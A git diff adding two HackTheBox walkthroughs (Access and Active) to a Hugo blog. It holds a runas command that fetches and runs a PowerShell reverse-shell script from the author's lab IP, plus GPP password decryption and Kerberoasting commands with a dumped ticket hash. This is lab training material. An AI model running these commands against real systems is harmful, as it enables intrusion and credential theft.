diff --git a/.gitignore b/.gitignore
index 1f3b413..f732d45 100644
--- a/.gitignore
+++ b/.gitignore
@@ -5,3 +5,4 @@ public
 #others
 node_modules
 .hugo_build.lock
+*.lock
diff --git a/config/_default/menus.en.toml b/config/_default/menus.en.toml
index df4969b..77fe59f 100644
--- a/config/_default/menus.en.toml
+++ b/config/_default/menus.en.toml
@@ -43,6 +43,12 @@
   pageRef = "categories/security"
   weight = 10
 
+[[main]]
+  name = "Writeup CTF"
+  parent = "Categories"
+  pageRef = "categories/writeup-ctf"
+  weight = 10
+
 [[main]]
   name = "About"
   pageRef = "about"
diff --git a/content/categories/_index.md b/content/categories/_index.md
index 7910cf4..ad57e8a 100644
--- a/content/categories/_index.md
+++ b/content/categories/_index.md
@@ -31,3 +31,13 @@ layout: "categories"
         <button class="bg-transparent hover:text-primary-500 prose dark:prose-invert font-semibold hover:text-white py-2 px-4 border border-primary-500 hover:border-transparent rounded">Show More</button>
     </a>
 </div>
+
+---
+
+{{< list title="Writeup CTF" cardView=true limit=3 where="Type" value="writeup-ctf" >}}
+
+<div class="mt-10 flex justify-center">
+    <a href="writeup-ctf">
+        <button class="bg-transparent hover:text-primary-500 prose dark:prose-invert font-semibold hover:text-white py-2 px-4 border border-primary-500 hover:border-transparent rounded">Show More</button>
+    </a>
+</div>
diff --git a/content/categories/writeup-ctf.md b/content/categories/writeup-ctf.md
new file mode 100644
index 0000000..bc763b6
--- /dev/null
+++ b/content/categories/writeup-ctf.md
@@ -0,0 +1,11 @@
+---
+title: "Writeup CTF"
+draft: false
+slug: "writeup-ctf"
+layout: "simple"
+showWordCount: false
+showReadingTime: false
+showDate: false
+---
+
+{{< list title=" " cardView=true limit=99 where="Type" value="writeup-ctf" >}}
diff --git a/.hugo_build.lock b/content/writeup-ctf/_index.md
similarity index 100%
rename from .hugo_build.lock
rename to content/writeup-ctf/_index.md
diff --git a/content/writeup-ctf/writeup-access-htb/featured.png b/content/writeup-ctf/writeup-access-htb/featured.png
new file mode 100644
index 0000000..f357634
--- /dev/null
+++ b/content/writeup-ctf/writeup-access-htb/featured.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:5b51df0e74336e5565534f4cb09a01b7e66fab1393aa076f240a1c26308e8a71
+size 247562
diff --git a/content/writeup-ctf/writeup-access-htb/featured.webp b/content/writeup-ctf/writeup-access-htb/featured.webp
new file mode 100644
index 0000000..58602ac
--- /dev/null
+++ b/content/writeup-ctf/writeup-access-htb/featured.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:e51314a57cc1b2df2b39cc19dae575f2fce27457701787afeadf634d91407378
+size 30548
diff --git a/content/writeup-ctf/writeup-access-htb/img/image-1.png b/content/writeup-ctf/writeup-access-htb/img/image-1.png
new file mode 100644
index 0000000..a1a73ac
--- /dev/null
+++ b/content/writeup-ctf/writeup-access-htb/img/image-1.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:debd125b04ed35e60c06dd78d7630f1aec22bef25652c92f82aecd97659b7722
+size 38732
diff --git a/content/writeup-ctf/writeup-access-htb/img/image-1.webp b/content/writeup-ctf/writeup-access-htb/img/image-1.webp
new file mode 100644
index 0000000..df35602
--- /dev/null
+++ b/content/writeup-ctf/writeup-access-htb/img/image-1.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:ebe715c52e304a8dcac1d4b9f4bcf785d41cab4d8df6901e8a9377d4440655ee
+size 35930
diff --git a/content/writeup-ctf/writeup-access-htb/img/image-10.png b/content/writeup-ctf/writeup-access-htb/img/image-10.png
new file mode 100644
index 0000000..cab7f60
--- /dev/null
+++ b/content/writeup-ctf/writeup-access-htb/img/image-10.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:6c61f9dc89032c76846256296e2279006dd537e24d59bbf6b93c4603bde6a6dd
+size 17164
diff --git a/content/writeup-ctf/writeup-access-htb/img/image-10.webp b/content/writeup-ctf/writeup-access-htb/img/image-10.webp
new file mode 100644
index 0000000..66e75bb
--- /dev/null
+++ b/content/writeup-ctf/writeup-access-htb/img/image-10.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:4829ef64164981667f357a2387226ce8268be76ec0f1578b7a397de3eaeb403a
+size 18342
diff --git a/content/writeup-ctf/writeup-access-htb/img/image-11.png b/content/writeup-ctf/writeup-access-htb/img/image-11.png
new file mode 100644
index 0000000..cb2e30c
--- /dev/null
+++ b/content/writeup-ctf/writeup-access-htb/img/image-11.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:f44ac88ab92bbc81b71ab5fa812d965edc57efcd59ba7544bc9d6a0f2e9b2fc0
+size 5277
diff --git a/content/writeup-ctf/writeup-access-htb/img/image-11.webp b/content/writeup-ctf/writeup-access-htb/img/image-11.webp
new file mode 100644
index 0000000..fc82e7e
--- /dev/null
+++ b/content/writeup-ctf/writeup-access-htb/img/image-11.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:6e548dd1560d08288bd8daf02234ea335232ed618645bd38f7ab783a010b40e7
+size 5252
diff --git a/content/writeup-ctf/writeup-access-htb/img/image-2.png b/content/writeup-ctf/writeup-access-htb/img/image-2.png
new file mode 100644
index 0000000..612248f
--- /dev/null
+++ b/content/writeup-ctf/writeup-access-htb/img/image-2.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:0804195d00fc869748ad92d0ba0c552ebd2f4cf2a8721c3a3e0fe71c5ee7868d
+size 377385
diff --git a/content/writeup-ctf/writeup-access-htb/img/image-2.webp b/content/writeup-ctf/writeup-access-htb/img/image-2.webp
new file mode 100644
index 0000000..27401b3
--- /dev/null
+++ b/content/writeup-ctf/writeup-access-htb/img/image-2.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:d8a96cc47dce9a9118c06d05a82559cc056c77b26e98285f3330332bf5af0591
+size 59020
diff --git a/content/writeup-ctf/writeup-access-htb/img/image-3.png b/content/writeup-ctf/writeup-access-htb/img/image-3.png
new file mode 100644
index 0000000..ba95bd1
--- /dev/null
+++ b/content/writeup-ctf/writeup-access-htb/img/image-3.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:ccf5d2816c21e4a891409e4daf2e06700eedfa5e372799d038c22958e9a20a02
+size 25572
diff --git a/content/writeup-ctf/writeup-access-htb/img/image-3.webp b/content/writeup-ctf/writeup-access-htb/img/image-3.webp
new file mode 100644
index 0000000..4aca2da
--- /dev/null
+++ b/content/writeup-ctf/writeup-access-htb/img/image-3.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:02aa87385edcf6cb51e4d88b0566d1658817b74dd58e0e4e2a51cab530358e20
+size 25282
diff --git a/content/writeup-ctf/writeup-access-htb/img/image-4.png b/content/writeup-ctf/writeup-access-htb/img/image-4.png
new file mode 100644
index 0000000..869b74b
--- /dev/null
+++ b/content/writeup-ctf/writeup-access-htb/img/image-4.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:26c092c06babcaeab06d21a509ffe556487b27101343eb2e7551895136285b5c
+size 68897
diff --git a/content/writeup-ctf/writeup-access-htb/img/image-4.webp b/content/writeup-ctf/writeup-access-htb/img/image-4.webp
new file mode 100644
index 0000000..ea3b105
--- /dev/null
+++ b/content/writeup-ctf/writeup-access-htb/img/image-4.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:810ad324f9d6afe8f6ec34e0504eb4f2fc7fcce15a86675d49a0ba3c2d80f504
+size 100110
diff --git a/content/writeup-ctf/writeup-access-htb/img/image-5.png b/content/writeup-ctf/writeup-access-htb/img/image-5.png
new file mode 100644
index 0000000..f5c9c9e
--- /dev/null
+++ b/content/writeup-ctf/writeup-access-htb/img/image-5.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:4e671142081762c8d6c7d9d4fd403daccfe70fd2075a50abdf3c39f15a55f84b
+size 13166
diff --git a/content/writeup-ctf/writeup-access-htb/img/image-5.webp b/content/writeup-ctf/writeup-access-htb/img/image-5.webp
new file mode 100644
index 0000000..1b388ae
--- /dev/null
+++ b/content/writeup-ctf/writeup-access-htb/img/image-5.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:614af298ab2c72b25799719c378770f22de1c57306857b00b6381709acb13be2
+size 15444
diff --git a/content/writeup-ctf/writeup-access-htb/img/image-6.png b/content/writeup-ctf/writeup-access-htb/img/image-6.png
new file mode 100644
index 0000000..3afd3f7
--- /dev/null
+++ b/content/writeup-ctf/writeup-access-htb/img/image-6.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:007aebee2e19da280e53cee5f5c4a2a97e304a624be1a4635812ae863c243da8
+size 10675
diff --git a/content/writeup-ctf/writeup-access-htb/img/image-6.webp b/content/writeup-ctf/writeup-access-htb/img/image-6.webp
new file mode 100644
index 0000000..8a71ba2
--- /dev/null
+++ b/content/writeup-ctf/writeup-access-htb/img/image-6.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:7f256a1812e2f8fa19e305d83a2be726e5fda9c68a915435ad559148fbf25b4d
+size 9252
diff --git a/content/writeup-ctf/writeup-access-htb/img/image-7.png b/content/writeup-ctf/writeup-access-htb/img/image-7.png
new file mode 100644
index 0000000..f1f6221
--- /dev/null
+++ b/content/writeup-ctf/writeup-access-htb/img/image-7.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:05dc75d287304dd5231cf4b34d228376e220db4b54c0104adeb8a6b3425553c6
+size 16649
diff --git a/content/writeup-ctf/writeup-access-htb/img/image-7.webp b/content/writeup-ctf/writeup-access-htb/img/image-7.webp
new file mode 100644
index 0000000..bc3ffb8
--- /dev/null
+++ b/content/writeup-ctf/writeup-access-htb/img/image-7.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:eab5e708f6931019b8f9212d9904bd7fbb16eb137c59bedb6a70644ff0a025e0
+size 12734
diff --git a/content/writeup-ctf/writeup-access-htb/img/image-8.png b/content/writeup-ctf/writeup-access-htb/img/image-8.png
new file mode 100644
index 0000000..6a67eb1
--- /dev/null
+++ b/content/writeup-ctf/writeup-access-htb/img/image-8.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:e9f1719ccc9f92de8ddb8b190d947a5457399b2b9481ace74bb6bb5ef00096ee
+size 7162
diff --git a/content/writeup-ctf/writeup-access-htb/img/image-8.webp b/content/writeup-ctf/writeup-access-htb/img/image-8.webp
new file mode 100644
index 0000000..5bda8f1
--- /dev/null
+++ b/content/writeup-ctf/writeup-access-htb/img/image-8.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:6290839b3432d304944df635a6954d7142d101839bdf1ee507d101574cbf4d4b
+size 7402
diff --git a/content/writeup-ctf/writeup-access-htb/img/image-9.png b/content/writeup-ctf/writeup-access-htb/img/image-9.png
new file mode 100644
index 0000000..d7d26c7
--- /dev/null
+++ b/content/writeup-ctf/writeup-access-htb/img/image-9.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:b5a21c43937a6427d140691c5bfa6eec85e7498fc4affb4c7309341387622720
+size 56522
diff --git a/content/writeup-ctf/writeup-access-htb/img/image-9.webp b/content/writeup-ctf/writeup-access-htb/img/image-9.webp
new file mode 100644
index 0000000..a6c967b
--- /dev/null
+++ b/content/writeup-ctf/writeup-access-htb/img/image-9.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:2bf179778bf508d3a49767378dc448fa801fcac6697e710899e812c41e12b4cc
+size 53026
diff --git a/content/writeup-ctf/writeup-access-htb/index.md b/content/writeup-ctf/writeup-access-htb/index.md
new file mode 100644
index 0000000..81a91df
--- /dev/null
+++ b/content/writeup-ctf/writeup-access-htb/index.md
@@ -0,0 +1,106 @@
+---
+title: "Writeup - Access (HTB)"
+date: 2022-04-15
+slug: "writeup-access-htb"
+type: "writeup-ctf"
+--- 
+
+This is a writeup for the [Access](https://app.hackthebox.com/machines/Access) machine from the HackTheBox site.
+
+## Enumeration
+
+First, let's start with a scan of our target with the following command:
+
+
+```bash
+nmap -sV -T4 -Pn 10.10.10.98
+```
+Three TCP ports are discovered:
+
+![](img/image-1.webp)
+
+- 21/tcp : FTP
+- 23/tcp : telnet
+- 80/tcp : HTTP web server (httpd 7.5)
+
+![](img/image-2.webp)
+
+## Exploit
+
+In the `nmap` scan we find an FTP server, let's try to connect as `anonymous`.
+
+![](img/image-3.webp)
+
+There are 2 folders in which we find the following files:
+- Access Control.zip
+- backup.mdb
+
+{{< alert >}}
+Before downloading the backup file with the command `get backup.mdb` you should use the command `binary`To read the contents of the backup file I use the command `mdb-tables`:
+{{< /alert >}}
+
+![](img/image-4.webp)
+
+In the different tables I find `auth_user`, interesting there could be credencial for an account.
+
+![](img/image-5.webp)
+
+I find an `engineer` account with the password `access4u@security`. I use this password to try to decompress the previously recovered archive.
+
+In the archive I find a `.pst`. To read its contents I use the following command:
+
+
+```bash
+readpst Access\ Control.pst -M
+```
+Among the different mails I find the following content:
+
+![](img/image-6.webp)
+
+A new password ! I try to connect to the telnet server with these credencials.
+
+![](img/image-7.webp)
+
+I now have a shell as `security` and I can get the first flag.
+
+![](img/image-8.webp)
+
+## Privilege escalation
+
+After a few minutes of exploration, I find a file on the Desktop of the `Public` user. In this file I find an interesting command! A runas with the user `Administrator`.
+
+![](img/image-9.webp)
+
+I will use this [script](https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1) to create a reverse shell Admin. So I get this file and I add the following line at the end of the file.
+
+
+```bash
+Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.17 -Port 1234
+```
+I then launch a web server on my machine.
+
+
+```bash
+python3 -m http.server 80
+```
+Then I download/run the script with the admin runas.
+
+
+```bash
+runas /user:ACCESS\Administrator /savecred "powershell iex(new-object net.webclient).downloadstring('http://10.10.14.17/Invoke-PowerShellTcp.ps1')"
+```
+I now have a reverse shell as Administrator!
+
+![](img/image-10.webp)
+
+So I can get the last flag back.
+
+![](img/image-11.webp)
+
+## Recommendations
+
+To patch this host I think it would be necessary to perform a number of actions:
+
+- Do not let the `anonymous` user enable in FTP server configuration
+- Do not store sensitive information in a folder accessible by several people via FTP/web/...
+- Do not give runas Administrator permission to a user
diff --git a/content/writeup-ctf/writeup-active-htb/featured.png b/content/writeup-ctf/writeup-active-htb/featured.png
new file mode 100644
index 0000000..103653a
--- /dev/null
+++ b/content/writeup-ctf/writeup-active-htb/featured.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:e0cbb76004b293bd70752a004680c6ad0b7f0a6ead1356f5f20510c2622e742c
+size 302934
diff --git a/content/writeup-ctf/writeup-active-htb/featured.webp b/content/writeup-ctf/writeup-active-htb/featured.webp
new file mode 100644
index 0000000..0f13bf2
--- /dev/null
+++ b/content/writeup-ctf/writeup-active-htb/featured.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:04560bd69275995fb2b53116d4b64028c95c01a36e63a06eb62e8abc4b50990c
+size 31792
diff --git a/content/writeup-ctf/writeup-active-htb/img/image-1.png b/content/writeup-ctf/writeup-active-htb/img/image-1.png
new file mode 100644
index 0000000..6d02db4
--- /dev/null
+++ b/content/writeup-ctf/writeup-active-htb/img/image-1.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:e89ecf0e35f94b8477bcec0a9473cbf7e6909e5df20e4a717447c205e960acbd
+size 110133
diff --git a/content/writeup-ctf/writeup-active-htb/img/image-1.webp b/content/writeup-ctf/writeup-active-htb/img/image-1.webp
new file mode 100644
index 0000000..8b9cf4f
--- /dev/null
+++ b/content/writeup-ctf/writeup-active-htb/img/image-1.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:03ae2848a225e04d693c0966511102667618e20ff12c37aa1eeba6aad67d2c3e
+size 90268
diff --git a/content/writeup-ctf/writeup-active-htb/img/image-10.png b/content/writeup-ctf/writeup-active-htb/img/image-10.png
new file mode 100644
index 0000000..7430b8c
--- /dev/null
+++ b/content/writeup-ctf/writeup-active-htb/img/image-10.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:debd00a4d86e7aed855ec5197c5ac4d5cd095aa1b602527dee9ca1f0549a50e2
+size 32212
diff --git a/content/writeup-ctf/writeup-active-htb/img/image-10.webp b/content/writeup-ctf/writeup-active-htb/img/image-10.webp
new file mode 100644
index 0000000..50559ef
--- /dev/null
+++ b/content/writeup-ctf/writeup-active-htb/img/image-10.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:867d895f45b2781000b707ad2b553e2c2104916a792cab4fc4d01c0913be8f61
+size 26372
diff --git a/content/writeup-ctf/writeup-active-htb/img/image-11.png b/content/writeup-ctf/writeup-active-htb/img/image-11.png
new file mode 100644
index 0000000..63d08ab
--- /dev/null
+++ b/content/writeup-ctf/writeup-active-htb/img/image-11.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:9e78375848cad70aed8eb3d51f2ff94a7dd0964c3cf515fd1eb9df330bf42762
+size 31976
diff --git a/content/writeup-ctf/writeup-active-htb/img/image-11.webp b/content/writeup-ctf/writeup-active-htb/img/image-11.webp
new file mode 100644
index 0000000..c1e5b5b
--- /dev/null
+++ b/content/writeup-ctf/writeup-active-htb/img/image-11.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:8f475a9c2a387db7e17dc532efb63a91469d648332d746bdb264caab55f5058d
+size 32492
diff --git a/content/writeup-ctf/writeup-active-htb/img/image-2.png b/content/writeup-ctf/writeup-active-htb/img/image-2.png
new file mode 100644
index 0000000..ed3856f
--- /dev/null
+++ b/content/writeup-ctf/writeup-active-htb/img/image-2.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:5ddc575a4f059a87a3c806b4525753b6f1341ea0ee2b577ee7af8dfaa7586c04
+size 57144
diff --git a/content/writeup-ctf/writeup-active-htb/img/image-2.webp b/content/writeup-ctf/writeup-active-htb/img/image-2.webp
new file mode 100644
index 0000000..c6e4040
--- /dev/null
+++ b/content/writeup-ctf/writeup-active-htb/img/image-2.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:e7cde51fc6e464a3c81324a533e039b491512faa0deeb59bc606bb306823430c
+size 52190
diff --git a/content/writeup-ctf/writeup-active-htb/img/image-3.png b/content/writeup-ctf/writeup-active-htb/img/image-3.png
new file mode 100644
index 0000000..e2e4957
--- /dev/null
+++ b/content/writeup-ctf/writeup-active-htb/img/image-3.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:5e028a0655bded3892d83de48205f57b721bea3a70e82854f3d4d3abc29d1d21
+size 14429
diff --git a/content/writeup-ctf/writeup-active-htb/img/image-3.webp b/content/writeup-ctf/writeup-active-htb/img/image-3.webp
new file mode 100644
index 0000000..aaafca7
--- /dev/null
+++ b/content/writeup-ctf/writeup-active-htb/img/image-3.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:7af2fcc27f11cced46af087fd8ddcc9f5f3012963edc2ce9591ef994836f55b2
+size 11832
diff --git a/content/writeup-ctf/writeup-active-htb/img/image-4.png b/content/writeup-ctf/writeup-active-htb/img/image-4.png
new file mode 100644
index 0000000..0da7e5d
--- /dev/null
+++ b/content/writeup-ctf/writeup-active-htb/img/image-4.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:ebc6d051c63e6289a353cd1a780c6ba93cc3bbf073566c744799f96570e9c8c0
+size 13174
diff --git a/content/writeup-ctf/writeup-active-htb/img/image-4.webp b/content/writeup-ctf/writeup-active-htb/img/image-4.webp
new file mode 100644
index 0000000..27fa8ac
--- /dev/null
+++ b/content/writeup-ctf/writeup-active-htb/img/image-4.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:3651bf6062c36cbbf5e932918cf75f1618e88422572571e03be7721beaf0b968
+size 10568
diff --git a/content/writeup-ctf/writeup-active-htb/img/image-5.png b/content/writeup-ctf/writeup-active-htb/img/image-5.png
new file mode 100644
index 0000000..b73df9f
--- /dev/null
+++ b/content/writeup-ctf/writeup-active-htb/img/image-5.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:c71356151756244db50e209eddd9bebfb9526d1c84699e988de42e4c5ed7e44b
+size 26736
diff --git a/content/writeup-ctf/writeup-active-htb/img/image-5.webp b/content/writeup-ctf/writeup-active-htb/img/image-5.webp
new file mode 100644
index 0000000..8ead44d
--- /dev/null
+++ b/content/writeup-ctf/writeup-active-htb/img/image-5.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:c04ac12d5df81241ed984be1c77524e1380cdc42427aaa55ad449645bee703f6
+size 19780
diff --git a/content/writeup-ctf/writeup-active-htb/img/image-6.png b/content/writeup-ctf/writeup-active-htb/img/image-6.png
new file mode 100644
index 0000000..746471d
--- /dev/null
+++ b/content/writeup-ctf/writeup-active-htb/img/image-6.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:64e69d253c2ef12ab3dc3ebe9c94f7d1d2ff96dcd7fbc923d4d5b269ea76fd61
+size 27359
diff --git a/content/writeup-ctf/writeup-active-htb/img/image-6.webp b/content/writeup-ctf/writeup-active-htb/img/image-6.webp
new file mode 100644
index 0000000..9b6f8ed
--- /dev/null
+++ b/content/writeup-ctf/writeup-active-htb/img/image-6.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:e5b3fac547fae1c21afe52cade08ef1597104e365a8c9d78cbf06420b1e35c48
+size 32272
diff --git a/content/writeup-ctf/writeup-active-htb/img/image-7.png b/content/writeup-ctf/writeup-active-htb/img/image-7.png
new file mode 100644
index 0000000..47cc76c
--- /dev/null
+++ b/content/writeup-ctf/writeup-active-htb/img/image-7.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:481728e4736e177e67e7adc5569bc132af89db7a642b119b12436b36d40a3a4e
+size 10933
diff --git a/content/writeup-ctf/writeup-active-htb/img/image-7.webp b/content/writeup-ctf/writeup-active-htb/img/image-7.webp
new file mode 100644
index 0000000..0884b71
--- /dev/null
+++ b/content/writeup-ctf/writeup-active-htb/img/image-7.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:5a654908123a53f6216e0b2e3272743e75cb90514cfff2e1e4a892f803b16a41
+size 10790
diff --git a/content/writeup-ctf/writeup-active-htb/img/image-8.png b/content/writeup-ctf/writeup-active-htb/img/image-8.png
new file mode 100644
index 0000000..db56dd6
--- /dev/null
+++ b/content/writeup-ctf/writeup-active-htb/img/image-8.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:4ae6b099111a7b77f5c364c12744bb5a5786e622388bc8b557b076e49ba199b1
+size 26543
diff --git a/content/writeup-ctf/writeup-active-htb/img/image-8.webp b/content/writeup-ctf/writeup-active-htb/img/image-8.webp
new file mode 100644
index 0000000..0b73ddb
--- /dev/null
+++ b/content/writeup-ctf/writeup-active-htb/img/image-8.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:1ed6c9aa4d2014d0244b7070f1b5fc41d7908482418d4553463e2fb09194335e
+size 25120
diff --git a/content/writeup-ctf/writeup-active-htb/img/image-9.png b/content/writeup-ctf/writeup-active-htb/img/image-9.png
new file mode 100644
index 0000000..158c342
--- /dev/null
+++ b/content/writeup-ctf/writeup-active-htb/img/image-9.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:7a8ff2e45eb7766f1c37dc1b1b1469103eb5b8be013385da3eb045378cb8f4fb
+size 33009
diff --git a/content/writeup-ctf/writeup-active-htb/img/image-9.webp b/content/writeup-ctf/writeup-active-htb/img/image-9.webp
new file mode 100644
index 0000000..6d6f6a0
--- /dev/null
+++ b/content/writeup-ctf/writeup-active-htb/img/image-9.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:5919baac954e989ea7a57796a29afb21446fae2b1bfd703bb2496a05429d1f4a
+size 32212
diff --git a/content/writeup-ctf/writeup-active-htb/index.md b/content/writeup-ctf/writeup-active-htb/index.md
new file mode 100644
index 0000000..2cb90c4
--- /dev/null
+++ b/content/writeup-ctf/writeup-active-htb/index.md
@@ -0,0 +1,125 @@
+---
+title: "Writeup - Active (HTB)"
+date: 2022-03-25
+slug: "writeup-active-htb"
+type: "writeup-ctf"
+--- 
+
+This is a writeup for the [Active](https://app.hackthebox.com/machines/Active) machine from the HackTheBox site.
+
+## Enumeration
+
+First, let's start with a scan of our target with the following command:
+
+
+```bash
+nmap -sV -T4 -Pn 10.10.10.100
+```
+Many TCP ports are discovered:
+
+![](img/image-1.webp)
+
+## Exploit
+
+First of all, let's make an enumeration of the users/shares with the following command:
+
+
+```bash
+enum4linux -a 10.10.10.100
+```
+![](img/image-2.webp)
+
+You can find a certain amount of information, but above all, a share is available for reading as an anonymous person. Let's see what we can find inside. To connect I use the following command:
+
+
+```bash
+smbclient --no-pass //10.10.10.100/Replication
+```
+In the share there are two folders, one of which is of particular interest to me: `Policies`. In this folder I find the file `Groups.xml` which contains information allowing the exploitation of the machine.
+
+[Exploiting GPP SYSVOL (Groups.xml) | VK9 Security](https://vk9-sec.com/exploiting-gpp-sysvol-groups-xml/)
+
+![](img/image-3.webp)
+
+And indeed in the file I find 2 important information: `name` and `cpassword`.
+
+
+```bash
+<?xml version="1.0" encoding="utf-8"?>
+<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
+</Groups>
+```
+As explained in the article above it is possible to decrypt the `cpassword` with the `gpp-decrypt` command.
+
+![](img/image-4.webp)
+
+We can therefore deduce the following credencials:
+
+user : active.htb\SVC\_TGS  
+pass : GPPstillStandingStrong2k18
+
+I now look at the permissions I have with these credentials:
+
+![](img/image-5.webp)
+
+I now have access to the share `Users`, let's see what's inside:
+
+![](img/image-6.webp)
+
+I quickly find the first flag on the desktop of the SVC-TGS user:
+
+![](img/image-7.webp)
+
+## Privilege escalation
+
+To realize the elevation of privilege and since I have the credential of a user, I will do a Kerberoasting.
+
+
+> Kerberoasting is a post-exploitation attack that extracts service account credential hashes from Active Directory for offline cracking. [complx.com](https://www.qomplx.com/qomplx-knowledge-kerberoasting-attacks-explained/#:~:text=Kerberoasting%20is%20a%20post%2Dexploitation,poor%20service%20account%20password%20hygiene.)
+
+To perform the hashes extraction I will use the following command:
+
+
+```bash
+impacket-GetUserSPNs active.htb/SVC_TGS -dc-ip 10.10.10.100 -outputfile output.txt -request
+```
+![](img/image-8.webp)
+
+
+```bash
+┌──(d3vyce㉿kali)-[~]
+└─$ cat output.txt 
+$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$b8d16f6a494a6a06a7954e6a89f01ae1$2c1fc9a4a13479b7c31b2f76a8d6e9b05d97f7c6557848ad2d87960e7c89104568eb3f0ec8eedb7ab3636cca2209ed5b1582c14da207c6dab05f8ef6fce1047075d6d5edf2386f87e85576d90c9cfbac94044dceab2a4dc70c2751b7d353927781444a3e852b0bd795ca6975fb95c55fa8a49787bcb4ab0e02beee3edcb9df5d5fe53600aa0d0da1b22aae42649eedfff67ee00a2464a3fcbdef110cbf8eadce8f715fe620b5580154442099ad3771ec32c585c72a9e2f7d58d43f7344844d3b17a3cbc4b3c143af7d86343c51d945edc429fce49ee91c90dce2cad6bd4f17f6d210ce8055f49d69cee83aeca19f43cf465c6ab4b1d9c7bc575ef95a43aa235aa8adda00f65db41895396cf4727a05b367e779d126a06ca0d3319e6ff06cc127bf95d833ee54158ce905a1fd0e3b4de2e20e31a336fd6d5f0bf2b67660ddfc22106773a069f63c4d5ffa7c0178123a68b0b63a937df8783e2fd581f61539958aea7493035b8dbabfbf2775e70fd67440df8f9bc07d47d172d87ad717c8a27e752317e4d21ce2a3f403bfa6e6574ab10895d4d4cecb4f4feb1e1c718ce7b9c338a5ca5749374af941665174ff4246aed685b3d095b45f916accaf0a17656b4115d62d60dbb684eecec1235ea79645b12d957897c55c0f21c650ca9cc257bfaaa9ffef0b60edf265f9456a0db411e40e6b4ece00e6a143b40a5de5c833e5cb9708040e0f56b341bdc2ddc2ea1acf38b966d0583a027709c744a03fa600d9d943b3d7ffe9de5f591ac5ad7cd6158a918b99d6b15155099428a441f2984e6f82d2bbb1e5dc16c77ef6cc3604275e93d76d63fe2465331